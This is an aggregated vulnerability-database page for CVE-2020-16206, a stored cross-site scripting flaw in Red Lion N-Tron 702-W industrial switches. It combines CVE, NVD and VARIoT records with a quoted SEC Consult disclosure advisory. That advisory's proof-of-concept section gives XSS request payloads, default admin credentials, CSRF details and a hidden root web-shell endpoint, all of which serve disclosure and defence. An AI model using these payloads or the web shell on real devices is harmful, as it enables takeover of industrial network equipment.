Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2020-16206
Vulnerability from cvelistv5
▼ | URL | Tags | |
---|---|---|---|
ics-cert@hq.dhs.gov | http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html | Exploit, Third Party Advisory, VDB Entry | |
ics-cert@hq.dhs.gov | http://seclists.org/fulldisclosure/2020/Sep/6 | Exploit, Mailing List, Third Party Advisory | |
ics-cert@hq.dhs.gov | https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01 | Third Party Advisory, US Government Resource | |
af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html | Exploit, Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2020/Sep/6 | Exploit, Mailing List, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01 | Third Party Advisory, US Government Resource |
Vendor | Product | Version | ||
---|---|---|---|---|
n/a | N-Tron 702-W / 702M12-W |
Version: Versions prior to all versions |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T13:37:53.512Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "name": "20200902 SEC Consult SA-20200902-0 :: Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W", "tags": [ "mailing-list", "x_refsource_FULLDISC", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "N-Tron 702-W / 702M12-W", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Versions prior to all versions" } ] } ], "descriptions": [ { "lang": "en", "value": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions)." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-79", "description": "IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (\u2018CROSS-SITE SCRIPTING\u2019) CWE-79", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-09-04T20:06:15", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "name": "20200902 SEC Consult SA-20200902-0 :: Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W", "tags": [ "mailing-list", "x_refsource_FULLDISC" ], "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-16206", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "N-Tron 702-W / 702M12-W", "version": { "version_data": [ { "version_value": "Versions prior to all versions" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions)." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (\u2018CROSS-SITE SCRIPTING\u2019) CWE-79" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01", "refsource": "MISC", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "name": "20200902 SEC Consult SA-20200902-0 :: Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "name": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-16206", "datePublished": "2020-09-01T20:40:15", "dateReserved": "2020-07-31T00:00:00", "dateUpdated": "2024-08-04T13:37:53.512Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "vulnerability-lookup:meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2020-16206\",\"sourceIdentifier\":\"ics-cert@hq.dhs.gov\",\"published\":\"2020-09-01T21:15:12.177\",\"lastModified\":\"2024-11-21T05:06:56.110\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions).\"},{\"lang\":\"es\",\"value\":\"El producto afectado es vulnerable a un ataque de tipo cross-site scripting almacenados, lo que puede permitir a un atacante ejecutar c\u00f3digo arbitrario remotamente para conseguir acceso a datos confidenciales en los dispositivos N-Tron 702-W / 702M12-W (todas las versiones)\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:S/C:N/I:P/A:N\",\"baseScore\":3.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"LOW\",\"exploitabilityScore\":6.8,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"ics-cert@hq.dhs.gov\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:redlion:n-tron_702-w_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3E7E2A2E-13BA-46CF-A98D-CC855C381834\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:redlion:n-tron_702-w:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"30885167-CD8F-4026-ADCB-2E07E772ECD5\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:redlion:n-tron_702m12-w_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6633FE15-2CF0-4F83-91AB-6B090684C284\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:redlion:n-tron_702m12-w:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"94F253CC-A9DC-463A-93F0-71DD4FC190FF\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2020/Sep/6\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2020/Sep/6\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]}]}}" } }
ghsa-422c-j857-w7c6
Vulnerability from github
The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions).
{ "affected": [], "aliases": [ "CVE-2020-16206" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2020-09-01T21:15:00Z", "severity": "LOW" }, "details": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions).", "id": "GHSA-422c-j857-w7c6", "modified": "2022-10-15T12:00:56Z", "published": "2022-05-24T17:27:06Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-16206" }, { "type": "WEB", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2020/Sep/6" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "type": "CVSS_V3" } ] }
fkie_cve-2020-16206
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
ics-cert@hq.dhs.gov | http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html | Exploit, Third Party Advisory, VDB Entry | |
ics-cert@hq.dhs.gov | http://seclists.org/fulldisclosure/2020/Sep/6 | Exploit, Mailing List, Third Party Advisory | |
ics-cert@hq.dhs.gov | https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01 | Third Party Advisory, US Government Resource | |
af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html | Exploit, Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2020/Sep/6 | Exploit, Mailing List, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01 | Third Party Advisory, US Government Resource |
Vendor | Product | Version | |
---|---|---|---|
redlion | n-tron_702-w_firmware | * | |
redlion | n-tron_702-w | - | |
redlion | n-tron_702m12-w_firmware | * | |
redlion | n-tron_702m12-w | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redlion:n-tron_702-w_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E7E2A2E-13BA-46CF-A98D-CC855C381834", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:redlion:n-tron_702-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "30885167-CD8F-4026-ADCB-2E07E772ECD5", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redlion:n-tron_702m12-w_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6633FE15-2CF0-4F83-91AB-6B090684C284", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:redlion:n-tron_702m12-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "94F253CC-A9DC-463A-93F0-71DD4FC190FF", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions)." }, { "lang": "es", "value": "El producto afectado es vulnerable a un ataque de tipo cross-site scripting almacenados, lo que puede permitir a un atacante ejecutar c\u00f3digo arbitrario remotamente para conseguir acceso a datos confidenciales en los dispositivos N-Tron 702-W / 702M12-W (todas las versiones)" } ], "id": "CVE-2020-16206", "lastModified": "2024-11-21T05:06:56.110", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 6.0, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-09-01T21:15:12.177", "references": [ { "source": "ics-cert@hq.dhs.gov", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" }, { "source": "ics-cert@hq.dhs.gov", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "source": "ics-cert@hq.dhs.gov", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" } ], "sourceIdentifier": "ics-cert@hq.dhs.gov", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-79" } ], "source": "ics-cert@hq.dhs.gov", "type": "Primary" } ] }
var-202009-0592
Vulnerability from variot
The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Exists in a cross-site scripting vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product.
Red Lion N-Tron 702-W/702M12-W has a cross-site scripting vulnerability. SEC Consult Vulnerability Lab Security Advisory < 20200902-0 >
title: Multiple Vulnerabilities
product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W
vulnerable version: <=2.0.26 fixed version: CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208, CVE-2020-16204 impact: High homepage: https://www.redlion.net/ found: 2020-02-28 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
"For over forty years, customers around the world have trusted Red Lion Controls. Our award-winning industrial automation and networking solutions provide critical information and controls to improve productivity, working with numerous devices and diverse protocols to access data."
Source: https://www.redlion.net
Business recommendation:
The vendor recommends to change the hardware and use a newer product. SEC Consult recommends to remove the device from productive environments. An attacker is also able to perform actions in the context of the attacked user. Such placed payloads cannot be detected via browser-protection mechanisms as they are embedded into the web-interface. An attacker is also able to perform actions in the context of the attacked user.
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208 CSRF protection is not implemented at all. Such a vulnerability enables an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link. An attacker is able to take over the device by exploiting this vulnerability.
4) Hidden OS Web-Shell Interface - CVE-2020-16204 An undocumented interface, that contains a web-shell to the underlying OS, was found to be present on the device. It is not referenced in the actual menu and is also not mentioned in the manual of the device. Commands can be executed as root on the device.
This endpoint seems to be a leftover of the used Atheros SDK.
5) Known BusyBox Vulnerabilities The used BusyBox toolkit in version 1.11.0 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector.
6) Outdated and Vulnerable Software Components Outdated and vulnerable software components were found on the device during a quick examination.
The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated device by using the MEDUSA scalable firmware runtime.
Proof of concept:
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210 The "pingtest_action.cgi" endpoint can be used to trigger reflected XSS. http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206 Injection of a XSS payload is possible on multiple endpoints. An example for permanent XSS on the endpoint "/network.cgi" is the following request:
POST /network.cgi HTTP/1.1 Host: $IP Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021 Content-Length: 915 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: ui_language=en_US Upgrade-Insecure-Requests: 1
-----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="netmode"
bridge -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="wlanipmode"
0 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="brip"
192.168.1.202 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="brmask"
255.255.255.0 -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="brgw"
192.168.1.1">alert(document.location) -----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="dns1"
-----------------------------195698564115308644282115103021 Content-Disposition: form-data; name="dns2"
-----------------------------195698564115308644282115103021--
This can also be embedded in the HTML code as shown below:
history.pushState('', '', '/')3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208 CSRF can be triggered on each endpoint as the whole web-interface does not implement any protection mechanisms. Changing the hostname to "SEC Consult" can be done with the following embedded HTML code:
history.pushState('', '', '/')4) Hidden OS Web-Shell Interface - CVE-2020-16204 The endpoint "/admin.cgi" is not referenced within the whole web-interface and also not documented in the manual. By browsing this endpoint, multiple actions can be natively triggered: * Execute commands in context of the root user * Upload files * Download files * Change access rights All other actions can be done via the command execution. The lack of CSRF protections allows attackers to execute commands on the device by luring a user on malicious web-pages.
5) Known BusyBox Vulnerabilities The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability.
ls "pressing "
test 55\;test.txt
6) Outdated Software Components By analyzing the firmware a lot of components are found to be outdated: * BusyBox 1.0.1 * PHP/FI 2.0.1 * Dnsmasq 2.35 * Boa 0.93.15
Vulnerable / tested versions:
the following firmware version has been tested: * Red Lion N-Tron 702-W / 2.0.26 * Red Lion N-Tron 702M12-W / 2.0.26
Vendor contact timeline:
2020-03-09: Contacting vendor through support.emea@redlion.net; No answer. 2020-03-17: Asked for status update; No answer. 2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to the list of recipients; No answer. 2020-04-13: Requested support for coordination from CERT@VDE for the advisory. Sent the advisory to the CERT. 2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in- formed. 2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that they are waiting for an update of Red Lion. 2020-08-20: Received CISA draft for an advisory from CERT@VDE. 2020-08-28: Found the published advisory on CISA's website* which was released on 2020-08-27. 2020-09-02: Release of security advisory.
- https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01
Solution:
Upgrade to newer hardware.
Workaround:
None.
Advisory URL:
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult Europe | Asia | North America
About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2020
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202009-0592", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "n-tron 702-w", "scope": "eq", "trust": 1.0, "vendor": "redlion", "version": "*" }, { "model": "n-tron 702m12-w", "scope": "eq", "trust": 1.0, "vendor": "redlion", "version": "*" }, { "model": "n-tron 702-w", "scope": null, "trust": 0.8, "vendor": "red lion controls", "version": null }, { "model": "n-tron 702m12-w", "scope": null, "trust": 0.8, "vendor": "red lion controls", "version": null }, { "model": "lion n-tron 702-w", "scope": null, "trust": 0.6, "vendor": "red", "version": null }, { "model": "lion n-tron 702m12-w", "scope": null, "trust": 0.6, "vendor": "red", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-49664" }, { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "NVD", "id": "CVE-2020-16206" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:redlion:n-tron_702-w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:redlion:n-tron_702m12-w_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-010486" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "T. Weber", "sources": [ { "db": "PACKETSTORM", "id": "159064" }, { "db": "CNNVD", "id": "CNNVD-202008-1371" } ], "trust": 0.7 }, "cve": "CVE-2020-16206", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2020-16206", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.0, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "None", "baseScore": 3.5, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "JVNDB-2020-010486", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-49664", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.3, "id": "CVE-2020-16206", "impactScore": 6.0, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.0, "baseSeverity": "Critical", 